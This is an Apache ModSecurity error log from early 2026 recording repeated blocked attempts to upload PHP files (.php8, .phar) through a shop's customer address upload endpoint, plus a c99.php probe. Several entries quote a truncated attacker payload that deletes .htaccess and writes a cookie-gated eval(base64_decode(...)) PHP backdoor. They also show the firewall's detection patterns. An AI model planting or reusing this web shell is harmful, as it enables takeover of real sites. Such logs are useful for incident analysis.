[Sat Jan 31 04:43:06.231051 2026] [:error] [pid 1768847] [client 185.65.202.110:50990] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.php8"] [unique_id "aX16SoXNGdrgkSFwkDV10wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:06.233454 2026] [:error] [pid 1768847] [client 185.65.202.110:50990] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.php8"] [unique_id "aX16SoXNGdrgkSFwkDV10wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 31 04:43:06.233636 2026] [:error] [pid 1768847] [client 185.65.202.110:50990] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/k/a/ka88364f428d25.php8"] [unique_id "aX16SoXNGdrgkSFwkDV10wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:03.629172 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Rule 7fc70ba80be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.phar"] [unique_id "aX8M73bumSOvDU2S9xRzDwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:03.631210 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.phar"] [unique_id "aX8M73bumSOvDU2S9xRzDwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:03.633712 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.phar"] [unique_id "aX8M73bumSOvDU2S9xRzDwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:03.633900 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.phar"] [unique_id "aX8M73bumSOvDU2S9xRzDwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:04.254864 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 6c88364f428d25.php8 found within FILES:custom_attributes[country_id]: 6c88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX8M8HbumSOvDU2S9xRzEAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/c/6c88364f428d25.phar
[Sun Feb 01 09:21:04.255502 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX8M8HbumSOvDU2S9xRzEAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/c/6c88364f428d25.phar
[Sun Feb 01 09:21:04.255670 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aX8M8HbumSOvDU2S9xRzEAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/c/6c88364f428d25.phar
[Sun Feb 01 09:21:05.755730 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Rule 7fc70ba80be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.php8"] [unique_id "aX8M8XbumSOvDU2S9xRzEQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:05.756236 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.php8"] [unique_id "aX8M8XbumSOvDU2S9xRzEQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:05.758888 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.php8"] [unique_id "aX8M8XbumSOvDU2S9xRzEQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Feb 01 09:21:05.759106 2026] [:error] [pid 1793104] [client 213.109.225.211:55050] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/c/6c88364f428d25.php8"] [unique_id "aX8M8XbumSOvDU2S9xRzEQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:15.747207 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Rule 7f4689563be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aYCZTxfQIm-LcOx0dWPFxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:15.747708 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aYCZTxfQIm-LcOx0dWPFxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:15.750139 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aYCZTxfQIm-LcOx0dWPFxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:15.750365 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aYCZTxfQIm-LcOx0dWPFxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:16.014326 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: dp88364f428d25.php8 found within FILES:custom_attributes[country_id]: dp88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYCZUBfQIm-LcOx0dWPFxQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Mon Feb 02 13:32:16.015024 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYCZUBfQIm-LcOx0dWPFxQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Mon Feb 02 13:32:16.015258 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYCZUBfQIm-LcOx0dWPFxQAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Mon Feb 02 13:32:16.380969 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Rule 7f4689563be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aYCZUBfQIm-LcOx0dWPFxgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:16.381461 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aYCZUBfQIm-LcOx0dWPFxgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:16.384055 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aYCZUBfQIm-LcOx0dWPFxgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 13:32:16.384246 2026] [:error] [pid 1813647] [client 194.110.207.62:51634] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aYCZUBfQIm-LcOx0dWPFxgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Feb 02 17:15:46.858746 2026] [php:error] [pid 1813909] [client 74.225.153.249:15742] script '/var/www/magento.test.indacotrentino.com/www/pub/images/c99.php' not found or unable to stat
[Tue Feb 03 16:59:32.659633 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Rule 7f80eb359be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.phar"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:32.660110 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.phar"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:32.662565 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.phar"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:32.662750 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.phar"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:32.879949 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5888364f428d25.php8 found within FILES:custom_attributes[country_id]: 5888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0gAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/8/5888364f428d25.phar
[Tue Feb 03 16:59:32.880626 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0gAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/8/5888364f428d25.phar
